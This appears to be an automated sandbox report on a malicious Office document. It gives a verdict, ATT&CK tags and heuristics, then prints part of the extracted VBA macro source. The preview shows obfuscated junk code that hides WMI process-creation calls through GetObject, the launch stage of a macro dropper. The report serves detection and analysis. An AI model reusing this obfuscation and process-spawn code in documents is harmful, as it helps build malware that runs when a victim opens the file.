Verdict: MALICIOUS
Risk Score: 142

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is an OLE document with a high-risk anomaly in its slack space and contains VBA macros, including an AutoOpen macro. The presence of an AutoOpen macro and the GetObject call strongly suggest the execution of malicious code upon opening. The VBA script itself is heavily obfuscated, making it difficult to determine the exact payload, but its structure implies it's designed to download and execute a second-stage artifact.
Heuristics (5)
- OLE document has large unaccounted-for region (severity: high, OLE_SLACK_ANOMALY): OLE file is 158,766 bytes but its declared streams total only 86,610 bytes; 72,156 bytes (45%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- VBA macros detected (severity: medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code.
- AutoOpen macro (severity: high, OLE_VBA_AUTOOPEN): AutoOpen macro.
- GetObject call (severity: high, OLE_VBA_GETOBJ): GetObject call.
- Embedded URL (severity: info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 41268 bytes |

SHA-256 (macros.bas): a79f6054d5c0d65eb02a252f083ad7f1964106a1ecf501cfaa621e60bfb6bc2e

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "a7880266"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "C840010"
Function s3148_()
Select Case R1566_
Case 516838731
m__285 = (j87807_8 * Fix(296178247 / CBool(o115_1))) - C13_37 / Oct(293393407) / 630377197 + CStr(I_558_23) - 660671192 + ChrB(X_19883)
End Select
Select Case p93_382
Case 77420656
i48054 = (Y1644314 * Fix(774667045 / CBool(f4349_))) - I52_120 / Oct(529354408) / 90262237 + CStr(i8450_) - 168691378 + ChrB(z___5_3)
End Select
Select Case u__60_8_
Case 30235116
U409_695 = (B490_4 * Fix(19556864 / CBool(Q392_258))) - D6_5_622 / Oct(728609941) / 106099904 + CStr(z70__30) - 733617483 + ChrB(i408_2_)
End Select
Select Case k670_6_
Case 647821167
i24_71 = (X8_800_4 * Fix(896535262 / CBool(J3__73))) - V__123 / Oct(319038763) / 336902251 + CStr(r21_55) - 571729712 + ChrB(n__87_)
End Select
Select Case O7_7_331
Case 162329689
I2_353 = (k_1_4_ * Fix(2283938 / CBool(J83_2_1_))) - H27426 / Oct(305651347) / 118717102 + CStr(d0_86__) - 272478045 + ChrB(h_06_988)
End Select
Select Case U_41__7
Case 698753536
k3_6382_ = (W_51400 * Fix(453048743 / CBool(v__89_06))) - X72467 / Oct(196484666) / 810741272 + CStr(f147387) - 282946352 + ChrB(K1____)
End Select
Select Case a__00_9
Case 203337892
j3921__ = (z__67_ * Fix(454390916 / CBool(p16_064))) - u18_5__ / Oct(268298586) / 543508811 + CStr(n57302_0) - 563238546 + ChrB(N91652_8)
End Select
End Function
Function l0_1__(o7_572_, Q__632__)
On Error Resume Next
Select Case M1__0_9
Case 49615010
M_7_311 = (H_4_28 * Fix(988689433 / CBool(K30484))) - T_88_99 / Oct(149282066) / 503026093 + CStr(z619690) - 592631230 + ChrB(m3087_)
End Select
Select Case Z678_9
Case 19993843
i_7952 = (k3_3_9 * Fix(413919346 / CBool(j73___))) - t2_0_168 / Oct(96083708) / 331985542 + CStr(n322_88_) - 917373509 + ChrB(D58_898_)
End Select
i253_50_ = X159_269 + "winmgmts:Win32" + s47661 + "_ProcessStartup" + M2_65_
Select Case i6_9945
Case 675298117
u34_959 = (k__5_51 * Fix(652825974 / CBool(v0140_))) - P_621_ / Oct(880846215) / 835072291 + CStr(l273__8) - 597682159 + ChrB(F59946)
End Select
Select Case P_3_4642
Case 723758910
E7__3_ = (d3_128 * Fix(150904099 / CBool(M36__0))) - o3886_ / Oct(513302008) / 694092139 + CStr(C_2854) - 619347939 + ChrB(b_24291)
End Select
Select Case I0____46
Case 678729379
m_15_35 = (j8306_ * Fix(580591602 / CBool(H1746_49))) - a517_148 / Oct(393622825) / 977817913 + CStr(f365085) - 465139037 + ChrB(X680_8)
End Select
j40_1__ = F965_0 + "winmgmts:Win32" + j373_5 + "_Process" + O_25_51
Select Case a608888_
Case 943495683
U_26_315 = (q08380_ * Fix(822252679 / CBool(V970_9_9))) - z818_45 / Oct(27061879) / 974788942 + CStr(M780_25) - 962437839 + ChrB(C__8_87)
End Select
Select Case z__1660
Case 777063855
z3984_3 = (P_4___ * Fix(598179275 / CBool(f59545))) - V065_8_ / Oct(106471359) / 909233529 + CStr(K_5125_) - 551170688 + ChrB(r2_693)
End Select
Select Case C_90_4_
Case 813565636
f52_22_ = (F33_2_2_ * Fix(76797393 / CBool(b__26043))) - Y03_138_ / Oct(284062389) / 174184373 + CStr(R_4__8) - 929465842 + ChrB(h272_51)
End Select
Set S04___ = GetObject(W57640 + i253_50_ + Q6___63)
Select Case D_25324
Case 657663429
Z_82793 = (G1__06 * Fix(120492041 / CBool(O__069))) - N_7299_ / Oct(382100021) / 960712356 + CStr(Q1660__5) - 226287301 + ChrB(w242699)
End Select
Select Case M_58__9
Case 933067159
C4_6_21 = (s_48_9 * Fix(795652300 / CBool(s868_0))) - H373770 / Oct(781117956) / 934453172 + CStr(V9_34__) - 791343344 + ChrB(X__991)
End Select
Select Case D59_03_
Case 539910223
Y361266 = (i_02_1_ * Fix(321892653 / CBool(F27__66))) - d6_176_7 / Oct(155155024) / 366
... (truncated)